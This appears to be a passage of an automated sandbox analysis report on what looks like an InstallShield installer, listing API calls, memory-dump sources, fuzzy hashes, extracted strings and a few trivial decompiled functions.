• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Heap$CreateDestroy
• String ID:
• API String ID: 3296620671-0
• Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
• Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
• Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
• Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00446FC7
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
• Instruction ID: dbdacd071930a5e86aa0c68e9f9425c322d557eaebe8e7e713bb5428c2ef9a07
• Opcode Fuzzy Hash: 4a3c49af93ba79db0bc14ebb5469e7102d4c44c77b7e0d30c7dd675cd8bf6e47
• Instruction Fuzzy Hash: B351C774E0520ADFDB04CF88C890BAEB7B2FF88304F248559D515AB391C335A986CF95
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001A348() {
	intOrPtr _t4;
	void* _t6;

	RegCloseKey( *(_t6 - 4)); // executed
	_t4 =  *((intOrPtr*)(_t6 - 8));
	return _t4;
}

APIs
• RegCloseKey.KERNELBASE(00000000), ref: 1001A355
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
• Instruction ID: 4111118035c4145df5d6207d544e668d3b67a138326457bd21328434b6feecb4
• Opcode Fuzzy Hash: d2df109e2e3a954468d9a82ee657232a079eb237185f4a8d45fe512a1c1b322a
• Instruction Fuzzy Hash: 0BB09239A00208ABCB28DB94D99896CBBB4EB49211B2002C8FD1957300CA32DE909B50
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E100196B0() {
    intOrPtr _t2;

    EnumWindows(E100193D0, 0);
    _t2 = *0x10333dcc; // 0x0
    return _t2;
}

APIs
• EnumWindows.USER32(100193D0,00000000), ref: 100196BA
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: EnumWindows
• String ID:
• API String ID: 1129996299-0
• Opcode ID: 77b17112a631a8c199090b994af9cf4bc8f4f79ff00ce9b4e913f7e21da1a7ac
• Instruction ID: 322803dc277e48624d363f96edb163e9ed7c0b181a64caac93bb68219832c0f6
• Opcode Fuzzy Hash: 77b17112a631a8c199090b994af9cf4bc8f4f79ff00ce9b4e913f7e21da1a7ac
• Instruction Fuzzy Hash: 36B09230240219A7D20097859C8AB40B7ACE344A54F508001F6085B6928AA1A4118555
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 68%
E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    void* _t5;
    void* _t13;

    E10015254();
    _push(_a4);
    _t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
    return _t5;
}

APIs
• ___security_init_cookie.LIBCMT ref: 1000EBD1
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ___security_init_cookie
• String ID:
• API String ID: 3657697845-0
• Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
• Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
• Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
• Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
Uniqueness
Uniqueness Score: -1.00%

Non-executed Functions

APIs
  • Part of subcall function 00411344: __EH_prolog3.LIBCMT ref: 0041134B
  • Part of subcall function 00411D8B: __EH_prolog3_GS.LIBCMT ref: 00411D95
  • Part of subcall function 00411D8B: SysStringLen.OLEAUT32(?), ref: 00411EBB
  • Part of subcall function 00411D8B: SysFreeString.OLEAUT32(?), ref: 00411ECA
• GetCommandLineW.KERNEL32(?,runfromtemp,00000000,00000001,00000001,?,CC858012,?,?,?,?,0046EDAD,000000FF), ref: 0043AD4E
• CommandLineToArgvW.SHELL32(00000000,?,?,?,?,0046EDAD,000000FF), ref: 0043AD55
• lstrlenW.KERNEL32(00000000,runprerequisites,00000000,00000000,00000000,?), ref: 0043AE67
• CoInitialize.OLE32(00000000), ref: 0043AE9B
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,00000104,?), ref: 0043AF2A
• _memset.LIBCMT ref: 0043AFA4
• CoUninitialize.OLE32(00000000,Running after reboot,?,00000001,Setup.cpp,?,00000001,reboot,00000000,00000000,00000000,?,?,00000000,?,?), ref: 0043B242
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 0041A194: __EH_prolog3_GS.LIBCMT ref: 0041A19E
  • Part of subcall function 0041A194: GetProcAddress.KERNEL32(?,RunISMSISetup), ref: 0041A1B0
  • Part of subcall function 00419082: __EH_prolog3.LIBCMT ref: 00419089
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 004393E3: __EH_prolog3.LIBCMT ref: 004393EA
• CoUninitialize.OLE32(?,?,00000001,?,00000000,Running after reboot,?,00000001,Setup.cpp,?,00000001,reboot,00000000,00000000,00000000), ref: 0043B2BC
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLastString$FreeH_prolog3$CommandH_prolog3_LineUninitialize$AddressArgvFileInitializeModuleNameProc_memsetlstrlen
• String ID: /IS_temp$ /debuglog$ /eprq$%s %s$%s /q"%s" /tempdisk1folder"%s" %s$%s%s$%s\%.04ld.mst$%s\%s.ini$0$>$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$HsG$ISSetup.dll$ISSetup.dll$InstallShield setup.exe (Unicode) started, cmdline: %s$Languages$Relaunching setup from temp$Running after reboot$Running as remove major upgrade$Setup returning %d$Setup.cpp$Skin$StartUp$Startup$Supported$WaitInstallation$clone_wait$debuglog$eprq$k$reboot$removeasmajorupgrade$runfromtemp$runprerequisites$setup.isn$tempdisk1folder
• API String ID: 1421209910-599718284
• Opcode ID: 1572c2a11dc52907bc31d20f1a4e6b8811222394388ba9cf3f0c9a87b7e51445
• Instruction ID: fd9a5758f8468140bf351392692f581eaac9445e1b4ce6b3223bf273c2e4f7a1
• Opcode Fuzzy Hash: 1572c2a11dc52907bc31d20f1a4e6b8811222394388ba9cf3f0c9a87b7e51445
• Instruction Fuzzy Hash: 0F136B70801259EEDB20EB64CD45BEEBBB4AB15304F1440EAE049771D2DB785F88DF9A
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044B740
                                                                                                                                                                          • __whiteout.LIBCMT ref: 0044B7AB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Locale$UpdateUpdate::___whiteout
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1169095537-1018135373
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0042275B
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00436D0C: __EH_prolog3_GS.LIBCMT ref: 00436D13
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000001), ref: 00422A61
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString$H_prolog3_H_prolog3_catch_MessageSend
                                                                                                                                                                          • String ID: 2$Attempting to get MSI 3.0 redist instead$Attempting to get file '%s' for MSI engine install$Delaying redist reboot...$Failed to get file$Got file '%s' for MSI engine install$HsG$HsG$HsG$InstallSource$MSI 3.1 needs to be installed, but is not available$MSI 3.1 to be installed, was not installed with redist package$PackageCode$PackageName$Reboot needed: %s$Reboot not suppressed, SuppressReboot not set and MSI installed$Reboot not suppressed, SuppressReboot set to N$Startup$SuppressReboot$SuppressReboot set to Yes or MSI not being installed, suppressing reboot$WindowsInstaller-KB893803-x86.exe$f$instmsi30.exe$msiaction.cpp$yes
                                                                                                                                                                          • API String ID: 527295363-1874067674
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00439984
                                                                                                                                                                          • _memset.LIBCMT ref: 004399B3
                                                                                                                                                                          • _memset.LIBCMT ref: 004399D0
                                                                                                                                                                          • _memset.LIBCMT ref: 004399EA
                                                                                                                                                                          • _memset.LIBCMT ref: 00439A04
                                                                                                                                                                          • _memset.LIBCMT ref: 00439A1E
                                                                                                                                                                          • _memset.LIBCMT ref: 00439A38
                                                                                                                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00439A49
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00439A7A
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00439A97
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 00439AB4
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 00439AD1
                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 00439AF2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$CreateKnownWell$DescriptorH_prolog3_InitializeSecurity
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4043395516-0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 0-1835203436
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004403C2
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 004403D9
                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004403E0
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004403F0
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004403FF
                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 00440406
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0044040C
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0044042F
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 00440435
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 0044045A
                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00440477
                                                                                                                                                                          • EqualSid.ADVAPI32(00000004,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 00440492
                                                                                                                                                                          • FreeSid.ADVAPI32(?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004404B2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Token$ErrorLast$CurrentInformationOpenProcessThread$AllocateEqualFreeH_prolog3_Initialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2153409075-0
                                                                                                                                                                          • Opcode ID: 362b57371d312c820e27fe210cd882d39df30997a4f031bf30fa55d35ffd89d7
                                                                                                                                                                          • Instruction ID: 1a281683d798c3f8b9f7c62d97eee49e2bcaa89c7765308c52ffe9046ff4ecd7
                                                                                                                                                                          • Opcode Fuzzy Hash: 362b57371d312c820e27fe210cd882d39df30997a4f031bf30fa55d35ffd89d7
                                                                                                                                                                          • Instruction Fuzzy Hash: 35318D71D00219AFEB109FE0DC49AAE7BB9FF08355F50403AE741F61A0D7388D528B68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetFileSize.KERNEL32(?,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419AF2
• GetProcessHeap.KERNEL32(00000008,00000001,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B13
• HeapAlloc.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B1A
• ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF), ref: 00419B38
• _strlen.LIBCMT ref: 00419B47
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B7C
• HeapFree.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B83
• GetProcessHeap.KERNEL32(00000008,00000003,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B93
• HeapAlloc.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B9A
• ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF), ref: 00419BB4
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419BD2
• HeapFree.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419BD9
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Heap$Process$File$AllocFreeRead$Size_strlen
• String ID:
• API String ID: 3537955524-0
• Opcode ID: 0b3569c417eed3e89c3a4bed03021a3410356841ba9018f40c9af4e24b11d9a1
• Instruction ID: a64d6fe9aef3a7ba32392a0484c250c8f7ac19bd419625298ff7b98670b9c8c1
• Opcode Fuzzy Hash: 0b3569c417eed3e89c3a4bed03021a3410356841ba9018f40c9af4e24b11d9a1
• Instruction Fuzzy Hash: 10312431A04201BBDB10ABA5DC0CFDB7BADFF49314F01052AF509D6191CB34AC84CB68
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0042A5F9
• _memset.LIBCMT ref: 0042A619
• GetTempPathW.KERNEL32(00000400,?), ref: 0042A62D
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
• FindFirstFileW.KERNEL32(?,?), ref: 0042A6B5
• CompareFileTime.KERNEL32(?,?), ref: 0042A6DF
• DeleteFileW.KERNEL32(?,?,?,?,00000001,?,?,00000001), ref: 0042A761
• FindNextFileW.KERNEL32(00000000,?), ref: 0042A77E
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFileLast$FindFreeString$CompareDeleteFirstH_prolog3_NextPathTempTime_memset
• String ID: *.mst
• API String ID: 2018102183-516677590
• Opcode ID: 47b652e8d3ad024fa999bdce82821c00df54335db485a37fbf3d77e33f6ed083
• Instruction ID: b3e7cf4e9c8bfe22a8c324cea388b1e5a2ac4153066a397a48a4969ef7f13115
• Opcode Fuzzy Hash: 47b652e8d3ad024fa999bdce82821c00df54335db485a37fbf3d77e33f6ed083
• Instruction Fuzzy Hash: 66415F31900269DADB10EBA0CC55BEEB7B8BF15304F4081EAE149A7091EFB45B84CF96
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0044031B
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00456C54: __EH_prolog3_GS.LIBCMT ref: 00456C5B
• LoadLibraryW.KERNEL32(-00000004,COMCTL32,?,00000001,00000074,0043CA17,?,00000001,clone_wait,00000000,00000001,00000001,Relaunching setup from temp,?,00000001,Setup.cpp), ref: 00440356
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00440383
• #17.COMCTL32 ref: 004403A3
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_$AddressH_prolog3LibraryLoadProc
• String ID: $COMCTL32$InitCommonControlsEx
• API String ID: 1649272465-1772614818
• Opcode ID: ae267aad3622e8362ed36a6c1b4be319410a88d0d50426d4fb658746908c8e15
• Instruction ID: 6bb33c0ed157ba849518c5bb9a96d22d821b1174db3a2efd95adbd8c7cff7cff
• Opcode Fuzzy Hash: ae267aad3622e8362ed36a6c1b4be319410a88d0d50426d4fb658746908c8e15
• Instruction Fuzzy Hash: 3B115B70804218DFEB10EBA4CD49B9D7BB8AF10308F64416EE445A3192DB785A09CB5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,0000000A,Startup,?), ref: 00458974
• OpenProcessToken.ADVAPI32(00000000,00000028,?,?,?,?,?,?,?,?,?,?,00000000,0000000A,Startup,?), ref: 00458981
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00458998
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004589C3
• ExitWindowsEx.USER32(00000002,0000FFFF), ref: 004589D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 1314775590-3733053543
• Opcode ID: ea8fa3837fad92b639545c942de9f556e1441be13a6613e85d1001e03d49e12d
• Instruction ID: 8f08c48101e60e9af304734d92f039aaffca5365822e166c0e7430c27466cd51
• Opcode Fuzzy Hash: ea8fa3837fad92b639545c942de9f556e1441be13a6613e85d1001e03d49e12d
• Instruction Fuzzy Hash: 8B0121B1A00219ABDB10EFE5DD49EFFBBB8FF09705F000029E509E2291DB749544CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32,GetNativeSystemInfo,?,00457A42,?,?,?,?,?,?,?,?,00457A1F,004210F7), ref: 004594DD
• GetProcAddress.KERNEL32(00000000), ref: 004594E4
• GetSystemInfo.KERNEL32(BzE,?,00457A42,?,?,?,?,?,?,?,?,00457A1F,004210F7), ref: 004594F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleInfoModuleProcSystem
• String ID: BzE$GetNativeSystemInfo$kernel32
• API String ID: 1167836806-3911614205
• Opcode ID: cc0d321c17ed721df0cc657c216c20be59d9c28346d9642c2746c2492da380b8
• Instruction ID: f00f38b57aeac7f931a8a09ca3bddd79efdca287aa47268e09fb3ab04aa300d4
• Opcode Fuzzy Hash: cc0d321c17ed721df0cc657c216c20be59d9c28346d9642c2746c2492da380b8
• Instruction Fuzzy Hash: 66D0A93124020ABB8E002FE5AC0D92E3B5DEA41A663910822F40C80613EA2A99808B1C
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindResourceW.KERNEL32(?,?,?), ref: 0041858A
• SizeofResource.KERNEL32(?,00000000), ref: 00418596
• LoadResource.KERNEL32(?,00000000), ref: 004185A2
• LockResource.KERNEL32(00000000), ref: 004185A9
  • Part of subcall function 00418404: __EH_prolog3_GS.LIBCMT ref: 0041840E
  • Part of subcall function 00418404: _memmove.LIBCMT ref: 004184E2
